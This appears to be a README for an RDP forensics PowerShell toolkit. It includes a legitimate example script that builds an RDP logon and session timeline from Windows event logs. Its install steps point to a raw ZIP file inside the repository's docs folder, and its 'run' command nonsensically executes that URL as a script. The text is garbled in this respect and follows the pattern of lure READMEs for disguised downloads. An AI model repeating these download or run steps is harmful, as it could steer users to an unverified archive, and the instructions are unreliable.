Welcome to RDP-Forensic, a PowerShell toolkit designed to make RDP forensics simple. This tool helps you analyze connection attempts, track authentication, and monitor sessions across Windows Event Logs. Whether you're managing a few computers or an entire network, RDP-Forensic gives you the insights you need to keep your environment secure.
To run RDP-Forensic, ensure your system meets the following requirements:
- Operating System: Windows 10 or later
- PowerShell Version: 5.1 or later
- Network Access: Ensure you can read the logs held by the Windows Event Log service on the machines you analyze.
- Disk Space: At least 100 MB free
To get started with RDP-Forensic, you need to download it from the Releases page. Follow these steps:
- Visit the Releases page: Download RDP-Forensic.
- On the Releases page, look for the most recent version of the software.
- Click on the https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip file to start the download.
- Once the download is complete, locate the file on your computer.
- Extract the files from the ZIP archive by right-clicking the file and selecting “Extract All.”
- Open the extracted folder to find the RDP-Forensic files.
You are now ready to run RDP-Forensic.
Follow these steps to run RDP-Forensic on your machine:
- Open PowerShell. You can find it by searching in the Start Menu.
- Navigate to the RDP-Forensic folder using the `cd` command, like this: `cd path\to\RDP-Forensic` (replace `path\to\RDP-Forensic` with the actual path to the folder).
- Run the script with the following command: `.\https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip`
- Wait for the script to execute. It will present you with options to analyze RDP connection attempts and sessions.
RDP-Forensic offers a variety of features designed for ease of use and effectiveness:
- Connection Tracking: Monitor all connection attempts to RDP services.
- Authentication Logs: Track who logged in and when.
- Session Management: See active RDP sessions with detailed statistics.
- Logoff Analysis: Understand when users log off and why.
- Export Reports: Generate summary reports for compliance and audits.
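As an added example that is not RDP-Forensic's own code, the following PowerShell builds the kind of connection and session timeline the feature list describes, from the two Windows logs that record RDP activity. It assumes an elevated PowerShell session on the host being examined (the Security log needs administrator rights); the output file name is an assumption of this example.

```powershell
# Added example, not part of RDP-Forensic. Assumes an elevated PowerShell
# session on the Windows host being examined (the Security log needs admin).
# Event IDs are the documented Windows ones: Security 4624 with LogonType 10
# (RemoteInteractive = RDP), and TerminalServices-LocalSessionManager 21/23/24/25
# (session logon / logoff / disconnect / reconnect).
$Days  = 7
$since = (Get-Date).AddDays(-$Days)

# Successful RDP logons. Fields come from the event XML, not the message
# text, so parsing does not depend on the system locale.
$rdpLogons = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4624; StartTime = $since
} -ErrorAction SilentlyContinue | ForEach-Object {
    $d = @{}
    foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d.LogonType -eq '10') {
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Event  = 'Logon'
            User   = "$($d.TargetDomainName)\$($d.TargetUserName)"
            Source = $d.IpAddress
            Detail = "LogonId=$($d.TargetLogonId)"
        }
    }
}

# Session lifecycle events from the Terminal Services session manager log.
$names = @{ 21 = 'SessionLogon'; 23 = 'SessionLogoff'; 24 = 'Disconnect'; 25 = 'Reconnect' }
$sessions = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
    Id        = 21, 23, 24, 25
    StartTime = $since
} -ErrorAction SilentlyContinue | ForEach-Object {
    $u = ([xml]$_.ToXml()).Event.UserData.EventXML
    [pscustomobject]@{
        Time   = $_.TimeCreated
        Event  = $names[$_.Id]
        User   = $u.User
        Source = $u.Address
        Detail = "SessionId=$($u.SessionID)"
    }
}

# One chronological timeline: logon, then disconnect/reconnect, then logoff.
# The CSV is the hand-off to a SIEM or an audit report.
$timeline = @($rdpLogons) + @($sessions) | Sort-Object Time
$timeline | Format-Table -AutoSize
$timeline | Export-Csv -NoTypeInformation -Path '.\rdp-timeline.csv'
```

A logon with no matching session logoff inside the window, or a source address that changes between disconnect and reconnect, is the kind of gap a reviewer follows up on.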
This toolkit focuses on essential areas related to RDP forensics, including:
- Compliance
- Event Viewer insights
- Logon analysis
- RDP forensics specifics
- Security auditing
- Session tracking for incident response
- SIEM integration
- Windows Server best practices
For further details on using each feature, refer to the documentation included in the RDP-Forensic folder. You can also find helpful information on the Wiki page of our GitHub repository.
If you encounter issues or have questions, feel free to open an issue on our GitHub page. We appreciate contributions and feedback to enhance RDP-Forensic.
We plan to update RDP-Forensic with new features regularly. Follow the repository for announcements on new releases and improvements.
For the latest version, return to the Releases page: Download RDP-Forensic.
Enjoy using RDP-Forensic, your go-to toolkit for RDP security analysis!